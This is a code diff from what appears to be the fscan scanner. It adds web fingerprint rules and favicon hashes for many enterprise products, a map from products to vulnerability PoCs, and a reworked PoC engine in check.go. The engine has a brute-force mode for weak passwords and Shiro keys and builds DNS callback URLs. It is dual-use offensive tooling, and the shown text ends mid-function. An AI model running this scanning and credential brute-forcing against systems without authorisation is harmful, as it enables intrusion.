+	{"致远OA", "code", "(/seeyon/common/|/seeyon/USER-DATA/IMAGES/LOGIN/login.gif)"},
+	{"discuz", "code", "(content=\"Discuz! X\")"},
+	{"Typecho", "code", "(Typecho</a>)"},
+	{"金蝶EAS", "code", "(easSessionId)"},
+	{"phpMyAdmin", "cookie", "(pma_lang|phpMyAdmin)"},
+	{"phpMyAdmin", "code", "(/themes/pmahomme/img/logo_right.png)"},
+	{"H3C-AM8000", "code", "(AM8000)"},
+	{"360企业版", "code", "(360EntWebAdminMD5Secret)"},
+	{"H3C公司产品", "code", "(service@h3c.com)"},
+	{"H3C ICG 1000", "code", "(ICG 1000系统管理)"},
+	{"Citrix-Metaframe", "code", "(window.location=\"/Citrix/MetaFrame)"},
+	{"H3C ER5100", "code", "(ER5100系统管理)"},
+	{"阿里云CDN", "code", "(cdn.aliyuncs.com)"},
+	{"CISCO_EPC3925", "code", "(Docsis_system)"},
+	{"CISCO ASR", "code", "(CISCO ASR)"},
+	{"H3C ER3200", "code", "(ER3200系统管理)"},
+	{"万户ezOFFICE", "headers", "(LocLan)"},
+	{"万户网络", "code", "(css/css_whir.css)"},
+	{"Spark_Master", "code", "(Spark Master at)"},
+	{"华为_HUAWEI_SRG2220", "code", "(HUAWEI SRG2220)"},
+	{"蓝凌OA", "code", "(/scripts/jquery.landray.common.js)"},
+	{"深信服ssl-vpn", "code", "(login_psw.csp)"},
+	{"华为 NetOpen", "code", "(/netopen/theme/css/inFrame.css)"},
+	{"Citrix-Web-PN-Server", "code", "(Citrix Web PN Server)"},
+	{"juniper_vpn", "code", "(welcome.cgi?p=logo|/images/logo_juniper_reversed.gif)"},
+	{"360主机卫士", "headers", "(zhuji.360.cn)"},
+	{"Nagios", "headers", "(Nagios Access)"},
+	{"H3C ER8300", "code", "(ER8300系统管理)"},
+	{"Citrix-Access-Gateway", "code", "(Citrix Access Gateway)"},
+	{"华为 MCU", "code", "(McuR5-min.js)"},
+	{"TP-LINK Wireless WDR3600", "code", "(TP-LINK Wireless WDR3600)"},
+	{"泛微OA", "headers", "(ecology_JSessionid)"},
+	{"泛微OA", "code", "(/spa/portal/public/index.js)"},
+	{"华为_HUAWEI_ASG2050", "code", "(HUAWEI ASG2050)"},
+	{"360网站卫士", "code", "(360wzb)"},
+	{"Citrix-XenServer", "code", "(Citrix Systems, Inc. XenServer)"},
+	{"H3C ER2100V2", "code", "(ER2100V2系统管理)"},
+	{"zabbix", "cookie", "(zbx_sessionid)"},
+	{"zabbix", "code", "(images/general/zabbix.ico|Zabbix SIA|zabbix-server: Zabbix)"},
+	{"CISCO_VPN", "headers", "(webvpn)"},
+	{"360站长平台", "code", "(360-site-verification)"},
+	{"H3C ER3108GW", "code", "(ER3108GW系统管理)"},
+	{"o2security_vpn", "headers", "(client_param=install_active)"},
+	{"H3C ER3260G2", "code", "(ER3260G2系统管理)"},
+	{"H3C ICG1000", "code", "(ICG1000系统管理)"},
+	{"CISCO-CX20", "code", "(CISCO-CX20)"},
+	{"H3C ER5200", "code", "(ER5200系统管理)"},
+	{"linksys-vpn-bragap14-parintins", "code", "(linksys-vpn-bragap14-parintins)"},
+	{"360网站卫士常用前端公共库", "code", "(libs.useso.com)"},
+	{"H3C ER3100", "code", "(ER3100系统管理)"},
+	{"H3C-SecBlade-FireWall", "code", "(js/MulPlatAPI.js)"},
+	{"360webfacil_360WebManager", "code", "(publico/template/)"},
+	{"Citrix_Netscaler", "code", "(ns_af)"},
+	{"H3C ER6300G2", "code", "(ER6300G2系统管理)"},
+	{"H3C ER3260", "code", "(ER3260系统管理)"},
+	{"华为_HUAWEI_SRG3250", "code", "(HUAWEI SRG3250)"},
+	{"exchange", "code", "(/owa/auth.owa|Exchange Admin Center)"},
+	{"Spark_Worker", "code", "(Spark Worker at)"},
+	{"H3C ER3108G", "code", "(ER3108G系统管理)"},
+	{"Citrix-ConfProxy", "code", "(confproxy)"},
+	{"360网站安全检测", "code", "(webscan.360.cn/status/pai/hash)"},
+	{"H3C ER5200G2", "code", "(ER5200G2系统管理)"},
+	{"华为（HUAWEI）安全设备", "code", "(sweb-lib/resource/)"},
+	{"华为（HUAWEI）USG", "code", "(UI_component/commonDefine/UI_regex_define.js)"},
+	{"H3C ER6300", "code", "(ER6300系统管理)"},
+	{"华为_HUAWEI_ASG2100", "code", "(HUAWEI ASG2100)"},
+	{"TP-Link 3600 DD-WRT", "code", "(TP-Link 3600 DD-WRT)"},
+	{"NETGEAR WNDR3600", "code", "(NETGEAR WNDR3600)"},
+	{"H3C ER2100", "code", "(ER2100系统管理)"},
+	{"jira", "code", "(jira.webresources)"},
+	{"金和协同管理平台", "code", "(金和协同管理平台)"},
+	{"Citrix-NetScaler", "code", "(NS-CACHE)"},
+	{"linksys-vpn", "headers", "(linksys-vpn)"},
+	{"通达OA", "code", "(/static/images/tongda.ico|http://www.tongda2000.com|通达OA移动版|Office Anywhere)"},
+	{"华为（HUAWEI）Secoway设备", "code", "(Secoway)"},
+	{"华为_HUAWEI_SRG1220", "code", "(HUAWEI SRG1220)"},
+	{"H3C ER2100n", "code", "(ER2100n系统管理)"},
+	{"H3C ER8300G2", "code", "(ER8300G2系统管理)"},
+	{"金蝶政务GSiS", "code", "(/kdgs/script/kdgs.js)"},
+	{"Jboss", "code", "(Welcome to JBoss|jboss.css)"},
+	{"Jboss", "headers", "(JBoss)"},
+	{"泛微E-mobile", "code", "(Weaver E-mobile|weaver,e-mobile)"},
+	{"泛微E-mobile", "headers", "(EMobileServer)"},
+	{"齐治堡垒机", "code", "(logo-icon-ico72.png|resources/themes/images/logo-login.png)"},
+	{"ThinkPHP", "headers", "(ThinkPHP)"},
+	{"ThinkPHP", "code", "(/Public/static/js/)"},
+	{"weaver-ebridge", "code", "(e-Bridge,http://wx.weaver)"},
+	{"Laravel", "headers", "(laravel_session)"},
+	{"DWR", "code", "(dwr/engine.js)"},
+	{"swagger_ui", "code", "(swagger-ui/css|\"swagger\":|swagger-ui.min.js)"},
+	{"大汉版通发布系统", "code", "(大汉版通发布系统|大汉网络)"},
+	{"druid", "code", "(druid.index|DruidDrivers|DruidVersion|Druid Stat Index)"},
+	{"Jenkins", "code", "(Jenkins)"},
+	{"红帆OA", "code", "(iOffice)"},
+	{"VMware vSphere", "code", "(VMware vSphere)"},
+	{"打印机", "code", "(打印机|media/canon.gif)"},
+	{"finereport", "code", "(isSupportForgetPwd|FineReport,Web Reporting Tool)"},
+	{"蓝凌OA", "code", "(蓝凌软件|StylePath:\"/resource/style/default/\"|/resource/customization|sys/ui/extend/theme/default/style/profile.css|sys/ui/extend/theme/default/style/icon.css)"},
+	{"GitLab", "code", "(href=\"https://about.gitlab.com/)"},
+	{"用友", "code", "(YONYOU NC | /Client/Uclient/UClient.dmg|iufo/web/css/menu.css|/System/Login/Login.asp?AppID=|/nc/servlet/nc.ui.iufo.login.Index)"},
+	{"Jquery-1.7.2", "code", "(/webui/js/jquerylib/jquery-1.7.2.min.js)"},
+	{"Hadoop Applications", "code", "(/cluster/app/application)"},
+	{"海昌OA", "code", "(/loginmain4/js/jquery.min.js)"},
+	{"帆软报表", "code", "(WebReport/login.html|ReportServer)"},
+	{"帆软报表", "headers", "(数据决策系统)"},
+	{"华夏ERP", "headers", "(华夏ERP)"},
+	{"金和OA", "cookie", "(ASPSESSIONIDSSCDTDBS)"},
+	{"久其财务报表", "code", "(netrep/login.jsp|/netrep/intf)"},
+	{"若依管理系统", "code", "(ruoyi/login.js|ruoyi/js/ry-ui.js)"},
+	{"启莱OA", "code", "(js/jQselect.js|js/jquery-1.4.2.min.js)"},
+	{"智慧校园管理系统", "code", "(DC_Login/QYSignUp)"},
+	{"JQuery-1.7.2", "code", "(webui/js/jquerylib/jquery-1.7.2.min.js)"},
+	{"浪潮 ClusterEngineV4.0", "code", "(0;url=module/login/login.html)"},
+	{"会捷通云视讯平台", "code", "(him/api/rest/v1.0/node/role|him.app)"},
+	{"源码泄露账号密码 F12查看", "code", "(get_dkey_passwd)"},
+	{"Smartbi Insight", "code", "(smartbi.gcf.gcfutil)"},
+	{"汉王人脸考勤管理系统", "code", "(汉王人脸考勤管理系统|/Content/image/hanvan.png|/Content/image/hvicon.ico)"},
+	{"亿赛通-电子文档安全管理系统", "code", "(电子文档安全管理系统|/CDGServer3/index.jsp|/CDGServer3/SysConfig.jsp|/CDGServer3/help/getEditionInfo.jsp)"},
+	{"天融信 TopApp-LB 负载均衡系统", "code", "(TopApp-LB 负载均衡系统)"},
+	{"中新金盾信息安全管理系统", "code", "(中新金盾信息安全管理系统|中新网络信息安全股份有限公司)"},
+	{"好视通", "code", "(深圳银澎云计算有限公司|itunes.apple.com/us/app/id549407870|hao-shi-tong-yun-hui-yi-yuan)"},
+	{"蓝海卓越计费管理系统", "code", "(蓝海卓越计费管理系统|星锐蓝海网络科技有限公司)"},
+	{"和信创天云桌面系统", "code", "(和信下一代云桌面VENGD|/vesystem/index.php)"},
+	{"金山", "code", "(北京猎鹰安全科技有限公司|金山终端安全系统V9.0Web控制台|北京金山安全管理系统技术有限公司|金山V8)"},
+	{"WIFISKY-7层流控路由器", "code", "(深圳市领空技术有限公司|WIFISKY 7层流控路由器)"},
+	{"MetInfo-米拓建站", "code", "(MetInfo|/skin/style/metinfo.css|/skin/style/metinfo-v2.css)"},
+	{"IBM-Lotus-Domino", "code", "(/mailjump.nsf|/domcfg.nsf|/names.nsf|/homepage.nsf)"},
+	{"APACHE-kylin", "code", "(url=kylin)"},
+	{"C-Lodop打印服务系统", "code", "(/CLodopfuncs.js|www.c-lodop.com)"},
+	{"ATLASSIAN-Confluence", "code", "(Atlassian Confluence)"},
+	{"HFS", "code", "(href=\"http://www.rejetto.com/hfs/)"},
+	{"Jellyfin", "code", "(content=\"http://jellyfin.org\")"},
+	{"FIT2CLOUD-JumpServer-堡垒机", "code", "(<title>JumpServer</title>)"},
+	{"Alibaba Nacos", "code", "(<title>Nacos</title>)"},
+	{"Nagios", "headers", "(nagios admin)"},
+	{"Pulse Connect Secure", "code", "(/dana-na/imgs/space.gif)"},
+	{"h5ai", "code", "(powered by h5ai)"},
+	{"jeesite", "cookie", "(jeesite.session.id)"},
+	{"拓尔思SSO", "cookie", "(trsidsssosessionid)"},
+	{"拓尔思WCMv7/6", "cookie", "(com.trs.idm.coSessionId)"},
+	{"天融信脆弱性扫描与管理系统", "code", "(/js/report/horizontalReportPanel.js)"},
+	{"天融信网络审计系统", "code", "(onclick=dlg_download())"},
+	{"天融信日志收集与分析系统", "code", "(天融信日志收集与分析系统)"},
+	{"URP教务系统", "code", "(北京清元优软科技有限公司)"},
+	{"科来RAS", "code", "(科来软件 版权所有|i18ninit.min.js)"},
+	{"正方OA", "code", "(zfoausername)"},
+	{"希尔OA", "code", "(/heeroa/login.do)"},
+	{"泛普建筑工程施工OA", "code", "(/dwr/interface/LoginService.js)"},
+	{"中望OA", "code", "(/IMAGES/default/first/xtoa_logo.png|/app_qjuserinfo/qjuserinfoadd.jsp)"},
+	{"海天OA", "code", "(HTVOS.js)"},
+	{"信达OA", "code", "(http://www.xdoa.cn</a>)"},
+	{"任我行CRM", "code", "(CRM_LASTLOGINUSERKEY)"},
+	{"Spammark邮件信息安全网关", "code", "(/cgi-bin/spammark?empty=1)"},
+	{"winwebmail", "code", "(WinWebMail Server|images/owin.css)"},
+	{"浪潮政务系统", "code", "(LangChao.ECGAP.OutPortal|OnlineQuery/QueryList.aspx)"},
+	{"天融信防火墙", "code", "(/cgi/maincgi.cgi)"},
+	{"网神防火墙", "code", "(css/lsec/login.css)"},
+	{"帕拉迪统一安全管理和综合审计系统", "code", "(module/image/pldsec.css)"},
+	{"蓝盾BDWebGuard", "code", "(BACKGROUND: url(images/loginbg.jpg) #e5f1fc)"},
+	{"Huawei SMC", "code", "(Script/SmcScript.js?version=)"},
+	{"coremail", "code", "(/coremail/bundle/|contextRoot: \"/coremail\"|coremail/common)"},
+	{"activemq", "code", "(activemq_logo|Manage ActiveMQ broker)"},
+	{"锐捷网络", "code", "(static/img/title.ico|support.ruijie.com.cn|Ruijie - NBR|eg.login.loginBtn)"},
+	{"禅道", "code", "(/theme/default/images/main/zt-logo.png|zentaosid)"},
+	{"weblogic", "code", "(/console/framework/skins/wlsconsole/images/login_WebLogic_branding.png|Welcome to Weblogic Application Server|<i>Hypertext Transfer Protocol -- HTTP/1.1</i>|<TITLE>Error 404--Not Found</TITLE>|Welcome to Weblogic Application Server|<title>Oracle WebLogic Server 管理控制台</title>)"},
+	{"weblogic", "headers", "(WebLogic)"},
+	{"致远OA", "code", "(/seeyon/USER-DATA/IMAGES/LOGIN/login.gif|/seeyon/common/)"},
+	{"蓝凌EIS智慧协同平台", "code", "(/scripts/jquery.landray.common.js)"},
+	{"深信服ssl-vpn", "code", "(login_psw.csp|loginPageSP/loginPrivacy.js|/por/login_psw.csp)"},
+	{"Struts2", "code", "(org.apache.struts2|Struts Problem Report|struts.devMode|struts-tags|There is no Action mapped for namespace)"},
+	{"泛微OA", "code", "(/spa/portal/public/index.js|wui/theme/ecology8/page/images/login/username_wev8.png|/wui/index.html#/?logintype=1)"},
+	{"Swagger UI", "code", "(/swagger-ui.css|swagger-ui-bundle.js|swagger-ui-standalone-preset.js)"},
+	{"金蝶政务GSiS", "code", "(/kdgs/script/kdgs.js|HTML5/content/themes/kdcss.min.css|/ClientBin/Kingdee.BOS.XPF.App.xap)"},
+	{"蓝凌OA", "code", "(蓝凌软件|StylePath:\"/resource/style/default/\"|/resource/customization|sys/ui/extend/theme/default/style/icon.css|sys/ui/extend/theme/default/style/profile.css)"},
+	{"用友NC", "code", "(YONYOU NC | /Client/Uclient/UClient.dmg|用友NC|logo/images/ufida_nc.png)"},
+	{"用友IUFO", "code", "(iufo/web/css/menu.css)"},
+	{"TELEPORT堡垒机", "code", "(/static/plugins/blur/background-blur.js)"},
+	{"JEECMS", "code", "(/r/cms/www/red/js/common.js|/r/cms/www/red/js/indexshow.js|Powered by JEECMS|JEECMS|/jeeadmin/jeecms/index.do)"},
+	{"CMS", "code", "(Powered by .*CMS)"},
+	{"目录遍历", "code", "(Directory listing for /)"},
+	{"ATLASSIAN-Confluence", "code", "(confluence.)"},
+	{"向日葵", "code", "({\"success\":false,\"msg\":\"Verification failure\"})"},
+	{"Kubernetes", "code", "(Kubernetes Dashboard</title>|Kubernetes Enterprise Manager|Mirantis Kubernetes Engine|Kubernetes Resource Report)"},
+	{"WordPress", "code", "(/wp-login.php?action=lostpassword|WordPress</title>)"},
+	{"RabbitMQ", "code", "(RabbitMQ Management)"},
+	{"dubbo", "headers", "(Basic realm=\"dubbo\")"},
+	{"Spring env", "code", "(logback)"},
+	{"ueditor", "code", "(ueditor.all.js|UE.getEditor)"},
+	{"亿邮电子邮件系统", "code", "(亿邮电子邮件系统|亿邮邮件整体解决方案)"},
+}
+
+var Md5Datas = []Md5Data{
+	{"BIG-IP", "04d9541338e525258daf47cc844d59f3"},
+	{"蓝凌OA", "302464c3f6207d57240649926cfc7bd4"},
+	{"JBOSS", "799f70b71314a7508326d1d2f68f7519"},
+	{"锐捷网络", "d8d7c9138e93d43579ebf2e384745ba8"},
+	{"锐捷网络", "9c21df9129aeec032df8ac15c84e050d"},
+	{"锐捷网络", "a45883b12d753bc87aff5bddbef16ab3"},
+	{"深信服edr", "0b24d4d5c7d300d50ee1cd96059a9e85"},
+	{"致远OA", "cdc85452665e7708caed3009ecb7d4e2"},
+	{"致远OA", "17ac348fcce0b320e7bfab3fe2858dfa"},
+	{"致远OA", "57f307ad3764553df84e7b14b7a85432"},
+	{"致远OA", "3c8df395ec2cbd72782286d18a286a9a"},
+	{"致远OA", "2f761c27b6b7f9386bbd61403635dc42"},
+	{"齐治堡垒机", "48ee373f098d8e96e53b7dd778f09ff4"},
+	{"SpringBoot", "0488faca4c19046b94d07c3ee83cf9d6"},
+	{"ThinkPHP", "f49c4a4bde1eec6c0b80c2277c76e3db"},
+	{"通达OA", "ed0044587917c76d08573577c8b72883"},
+	{"泛微E-mobile", "41eca7a9245394106a09b2534d8030df"},
+	{"泛微OA", "c27547e27e1d2c7514545cd8d5988946"},
+	{"泛微OA", "9b1d3f08ede38dbe699d6b2e72a8febb"},
+	{"泛微OA", "281348dd57383c1f214ffb8aed3a1210"},
+	{"GitLab", "85c754581e1d4b628be5b7712c042224"},
+	{"Hikvision-视频监控", "89b932fcc47cf4ca3faadb0cfdef89cf"},
+	{"华夏erp", "c68b15c45cf80115a943772f7d0028a6"},
+	{"OpenSNS", "08711abfb016a55c0e84f7b54bef5632"},
+	{"MetInfo-米拓建站", "2a9541b5c2225ed2f28734c0d75e456f"},
+	{"IBM-Lotus-Domino", "36c1002bb579edf52a472b9d2e39bb50"},
+	{"IBM-Lotus-Domino", "639b61409215d770a99667b446c80ea1"},
+	{"ATLASSIAN-Confluence", "b91d19259cf480661ef93b67beb45234"},
+	{"activemq", "05664fb0c7afcd6436179437e31f3aa6"},
+	{"coremail", "ad74ff8f9a2f630fc2c5e6b3aa0a5cb8"},
+}
+
+var PocDatas = []PocData{
+	{"致远OA", "seeyon"},
+	{"泛微OA", "weaver"},
+	{"通达OA", "tongda"},
+	{"蓝凌OA", "landray"},
+	{"ThinkPHP", "thinkphp"},
+	{"Nexus", "nexus"},
+	{"齐治堡垒机", "qizhi"},
+	{"weaver-ebridge", "weaver-ebridge"},
+	{"weblogic", "weblogic"},
+	{"zabbix", "zabbix"},
+	{"VMware vSphere", "vmware"},
+	{"Jboss", "jboss"},
+	{"用友", "yongyou"},
+	{"用友IUFO", "yongyou"},
+	{"coremail", "coremail"},
+	{"金山", "kingsoft"},
+}
--- a/WebScan/lib/check.go
+++ b/WebScan/lib/check.go
@@ -1,14 +1,15 @@
 package lib

 import (
-	"embed"
+	"crypto/md5"
 	"fmt"
+	"github.com/google/cel-go/cel"
+	"github.com/shadow1ng/fscan/WebScan/info"
 	"github.com/shadow1ng/fscan/common"
 	"math/rand"
 	"net/http"
 	"net/url"
 	"regexp"
-	"sort"
 	"strings"
 	"sync"
 	"time"
@@ -24,103 +25,97 @@ type Task struct {
 	Poc *Poc
 }

-func CheckMultiPoc(req *http.Request, Pocs embed.FS, workers int, pocname string) {
+func CheckMultiPoc(req *http.Request, pocs []*Poc, workers int) {
 	tasks := make(chan Task)
 	var wg sync.WaitGroup
 	for i := 0; i < workers; i++ {
 		go func() {
-			wg.Add(1)
 			for task := range tasks {
-				isVul, err := executePoc(task.Req, task.Poc)
-				if err != nil {
-					continue
-				}
+				isVul, _, name := executePoc(task.Req, task.Poc)
 				if isVul {
-					result := fmt.Sprintf("%s %s", task.Req.URL, task.Poc.Name)
+					result := fmt.Sprintf("[+] %s %s %s", task.Req.URL, task.Poc.Name, name)
 					common.LogSuccess(result)
 				}
+				wg.Done()
 			}
-			wg.Done()
 		}()
 	}
-	for _, poc := range LoadMultiPoc(Pocs, pocname) {
+	for _, poc := range pocs {
 		task := Task{
 			Req: req,
 			Poc: poc,
 		}
+		wg.Add(1)
 		tasks <- task
 	}
-	close(tasks)
 	wg.Wait()
+	close(tasks)
 }

-func executePoc(oReq *http.Request, p *Poc) (bool, error) {
+func executePoc(oReq *http.Request, p *Poc) (bool, error, string) {
 	c := NewEnvOption()
 	c.UpdateCompileOptions(p.Set)
+	if len(p.Sets) > 0 {
+		var setMap StrMap
+		for _, item := range p.Sets {
+			if len(item.Value) > 0 {
+				setMap = append(setMap, StrItem{item.Key, item.Value[0]})
+			} else {
+				setMap = append(setMap, StrItem{item.Key, ""})
+			}
+		}
+		c.UpdateCompileOptions(setMap)
+	}
 	env, err := NewEnv(&c)
 	if err != nil {
-		fmt.Println("environment creation error: %s\n", err)
-		return false, err
+		fmt.Printf("[-] %s environment creation error: %s\n", p.Name, err)
+		return false, err, ""
 	}
-	variableMap := make(map[string]interface{})
 	req, err := ParseRequest(oReq)
 	if err != nil {
-		//fmt.Println(err)
-		return false, err
+		fmt.Printf("[-] %s ParseRequest error: %s\n", p.Name, err)
+		return false, err, ""
 	}
+	variableMap := make(map[string]interface{})
+	defer func() { variableMap = nil }()
 	variableMap["request"] = req
-
-	// 现在假定set中payload作为最后产出，那么先排序解析其他的自定义变量，更新map[string]interface{}后再来解析payload
-	keys := make([]string, 0)
-	for k := range p.Set {
-		keys = append(keys, k)
-	}
-	sort.Strings(keys)
-
-	for _, k := range keys {
-		expression := p.Set[k]
-		if k != "payload" {
-			if expression == "newReverse()" {
-				variableMap[k] = newReverse()
-				continue
-			}
-			out, err := Evaluate(env, expression, variableMap)
-			if err != nil {
-				//fmt.Println(err)
-				continue
-			}
-			switch value := out.Value().(type) {
-			case *UrlType:
-				variableMap[k] = UrlTypeToString(value)
-			case int64:
-				variableMap[k] = int(value)
-			default:
-				variableMap[k] = fmt.Sprintf("%v", out)
-			}
+	for _, item := range p.Set {
+		k, expression := item.Key, item.Value
+		if expression == "newReverse()" {
+			variableMap[k] = newReverse()
+			continue
 		}
-	}
-
-	if p.Set["payload"] != "" {
-		out, err := Evaluate(env, p.Set["payload"], variableMap)
+		err, _ = evalset(env, variableMap, k, expression)
 		if err != nil {
-			return false, err
+			fmt.Printf("[-] %s evalset error: %v", p.Name, err)
 		}
-		variableMap["payload"] = fmt.Sprintf("%v", out)
+	}
+	success := false
+	//爆破模式,比如tomcat弱口令
+	if len(p.Sets) > 0 {
+		success, err = clusterpoc(oReq, p, variableMap, req, env)
+		return success, nil, ""
 	}

-	success := false
-	for _, rule := range p.Rules {
+	DealWithRule := func(rule Rules) (bool, error) {
+		Headers := cloneMap(rule.Headers)
+		var (
+			flag, ok bool
+		)
 		for k1, v1 := range variableMap {
 			_, isMap := v1.(map[string]string)
 			if isMap {
 				continue
 			}
 			value := fmt.Sprintf("%v", v1)
-			for k2, v2 := range rule.Headers {
-				rule.Headers[k2] = strings.ReplaceAll(v2, "{{"+k1+"}}", value)
+			for k2, v2 := range Headers {
+				if !strings.Contains(v2, "{{"+k1+"}}") {
+					continue
+				}
+				Headers[k2] = strings.ReplaceAll(v2, "{{"+k1+"}}", value)
 			}
-			rule.Path = strings.ReplaceAll(strings.TrimSpace(rule.Path), "{{"+k1+"}}", value)
-			rule.Body = strings.ReplaceAll(strings.TrimSpace(rule.Body), "{{"+k1+"}}", value)
+			rule.Path = strings.ReplaceAll(rule.Path, "{{"+k1+"}}", value)
+			rule.Body = strings.ReplaceAll(rule.Body, "{{"+k1+"}}", value)
 		}

 		if oReq.URL.Path != "" && oReq.URL.Path != "/" {
@@ -130,14 +125,20 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error) {
 		}
 		// 某些poc没有区分path和query，需要处理
 		req.Url.Path = strings.ReplaceAll(req.Url.Path, " ", "%20")
-		req.Url.Path = strings.ReplaceAll(req.Url.Path, "+", "%20")
+		//req.Url.Path = strings.ReplaceAll(req.Url.Path, "+", "%20")

-		newRequest, _ := http.NewRequest(rule.Method, fmt.Sprintf("%s://%s%s", req.Url.Scheme, req.Url.Host, req.Url.Path), strings.NewReader(rule.Body))
+		newRequest, err := http.NewRequest(rule.Method, fmt.Sprintf("%s://%s%s", req.Url.Scheme, req.Url.Host, string([]rune(req.Url.Path))), strings.NewReader(rule.Body))
+		if err != nil {
+			//fmt.Println("[-] newRequest error: ",err)
+			return false, err
+		}
 		newRequest.Header = oReq.Header.Clone()
-		for k, v := range rule.Headers {
+		for k, v := range Headers {
 			newRequest.Header.Set(k, v)
 		}
+		Headers = nil
 		resp, err := DoRequest(newRequest, rule.FollowRedirects)
+		newRequest = nil
 		if err != nil {
 			return false, err
 		}
@@ -149,24 +150,54 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error) {
 				for k, v := range result {
 					variableMap[k] = v
 				}
-				//return false, nil
 			} else {
 				return false, nil
 			}
 		}
-
 		out, err := Evaluate(env, rule.Expression, variableMap)
 		if err != nil {
 			return false, err
 		}
 		//fmt.Println(fmt.Sprintf("%v, %s", out, out.Type().TypeName()))
-		if fmt.Sprintf("%v", out) == "false" { //如果false不继续执行后续rule
-			success = false // 如果最后一步执行失败，就算前面成功了最终依旧是失败
-			break
+		//如果false不继续执行后续rule
+		// 如果最后一步执行失败，就算前面成功了最终依旧是失败
+		flag, ok = out.Value().(bool)
+		if !ok {
+			flag = false
 		}
-		success = true
+		return flag, nil
 	}
-	return success, nil
+
+	DealWithRules := func(rules []Rules) bool {
+		successFlag := false
+		for _, rule := range rules {
+			flag, err := DealWithRule(rule)
+			//if err != nil {
+			//	fmt.Printf("[-] %s Execute Rule error: %s\n",p.Name,err.Error())
+			//}
+
+			if err != nil || !flag { //如果false不继续执行后续rule
+				successFlag = false // 如果其中一步为flag，则直接break
+				break
+			}
+			successFlag = true
+		}
+		return successFlag
+	}
+
+	if len(p.Rules) > 0 {
+		success = DealWithRules(p.Rules)
+	} else {
+		for _, item := range p.Groups {
+			name, rules := item.Key, item.Value
+			success = DealWithRules(rules)
+			if success {
+				return success, nil, name
+			}
+		}
+	}
+
+	return success, nil, ""
 }

 func doSearch(re string, body string) map[string]string {
@@ -190,11 +221,12 @@ func doSearch(re string, body string) map[string]string {

 func newReverse() *Reverse {
 	letters := "1234567890abcdefghijklmnopqrstuvwxyz"
-	randSource := rand.New(rand.NewSource(time.Now().Unix()))
+	randSource := rand.New(rand.NewSource(time.Now().UnixNano()))
 	sub := RandomStr(randSource, letters, 8)
-	if ceyeDomain == "" {
-		return &Reverse{}
-	}
+	//if true {
+	//	//默认不开启dns解析
+	//	return &Reverse{}
+	//}
 	urlStr := fmt.Sprintf("http://%s.%s", sub, ceyeDomain)
 	u, _ := url.Parse(urlStr)
 	return &Reverse{
@@ -204,3 +236,285 @@ func newReverse() *Reverse {
 		IsDomainNameServer: false,
 	}
 }
+
+func clusterpoc(oReq *http.Request, p *Poc, variableMap map[string]interface{}, req *Request, env *cel.Env) (success bool, err error) {
+	var strMap StrMap
+	var tmpnum int
+	for i, rule := range p.Rules {
+		if !isFuzz(rule, p.Sets) {
+			success, err = clustersend(oReq, variableMap, req, env, rule)
+			if err != nil {
+				return false, err
+			}
+			if success {
+				continue
+			} else {
+				return false, err
+			}
+		}
+		setsMap := Combo(p.Sets)
+		ruleHash := make(map[string]struct{})
+	look:
+		for j, item := range setsMap {
+			//shiro默认只跑10key
+			if p.Name == "poc-yaml-shiro-key" && !common.PocFull && j >= 10 {
+				if item[1] == "cbc" {
+					continue
+				} else {
+					if tmpnum == 0 {
+						tmpnum = j
+					}
+					if j-tmpnum >= 10 {
+						break
+					}
+				}
+			}
+			rule1 := cloneRules(rule)
+			var flag1 bool
+			var tmpMap StrMap
+			var payloads = make(map[string]interface{})
+			var tmpexpression string
+			for i, one := range p.Sets {
+				key, expression := one.Key, item[i]
+				if key == "payload" {
+					tmpexpression = expression
+				}
+				_, output := evalset1(env, variableMap, key, expression)
+				payloads[key] = output
+			}
+			for _, one := range p.Sets {
+				flag := false
+				key := one.Key
+				value := fmt.Sprintf("%v", payloads[key])
+				for k2, v2 := range rule1.Headers {
+					if strings.Contains(v2, "{{"+key+"}}") {
+						rule1.Headers[k2] = strings.ReplaceAll(v2, "{{"+key+"}}", value)
+						flag = true
+					}
+				}
+				if strings.Contains(rule1.Path, "{{"+key+"}}") {
+					rule1.Path = strings.ReplaceAll(rule1.Path, "{{"+key+"}}", value)
+					flag = true
+				}
+				if strings.Contains(rule1.Body, "{{"+key+"}}") {
+					rule1.Body = strings.ReplaceAll(rule1.Body, "{{"+key+"}}", value)
+					flag = true
+				}
+				if flag {
+					flag1 = true
+					if key == "payload" {
+						var flag2 bool
+						for k, v := range variableMap {
+							if strings.Contains(tmpexpression, k) {
+								flag2 = true
+								tmpMap = append(tmpMap, StrItem{k, fmt.Sprintf("%v", v)})
+							}
+						}
+						if flag2 {
+							continue
+						}
+					}
+					tmpMap = append(tmpMap, StrItem{key, value})
+				}
+			}
+			if !flag1 {
+				continue
+			}
+			has := md5.Sum([]byte(fmt.Sprintf("%v", rule1)))
+			md5str := fmt.Sprintf("%x", has)
+			if _, ok := ruleHash[md5str]; ok {
+				continue
+			}
+			ruleHash[md5str] = struct{}{}
+			success, err = clustersend(oReq, variableMap, req, env, rule1)
+			if err != nil {
+				return false, err
+			}
+			if success {
+				if rule.Continue {
+					if p.Name == "poc-yaml-backup-file" || p.Name == "poc-yaml-sql-file" {
+						common.LogSuccess(fmt.Sprintf("[+] %s://%s%s %s", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name))
+					} else {
+						common.LogSuccess(fmt.Sprintf("[+] %s://%s%s %s %v", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name, tmpMap))
+					}
+					continue
+				}
+				strMap = append(strMap, tmpMap...)
+				if i == len(p.Rules)-1 {
+					common.LogSuccess(fmt.Sprintf("[+] %s://%s%s %s %v", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name, strMap))
+					//防止后续继续打印poc成功信息
+					return false, nil
+				}
+				break look
+			}
+		}
+		if !success {
+			break
+		}
+		if rule.Continue {
+			//防止后续继续打印poc成功信息
+			return false, nil
+		}
+	}
+	return success, nil
+}
+
+func isFuzz(rule Rules, Sets ListMap) bool {
+	for _, one := range Sets {
+		key := one.Key
+		for _, v := range rule.Headers {
+			if strings.Contains(v, "{{"+key+"}}") {
+				return true
+			}
+		}
+		if strings.Contains(rule.Path, "{{"+key+"}}") {
+			return true
+		}
+		if strings.Contains(rule.Body, "{{"+key+"}}") {
+			return true
+		}
+	}
+	return false
+}
+
+func Combo(input ListMap) (output [][]string) {
+	if len(input) > 1 {
+		output = Combo(input[1:])
+		output = MakeData(output, input[0].Value)
+	} else {
+		for _, i := range input[0].Value {
+			output = append(output, []string{i})
+		}
+	}
+	return
+}
+
+func MakeData(base [][]string, nextData []string) (output [][]string) {
+	for i := range base {
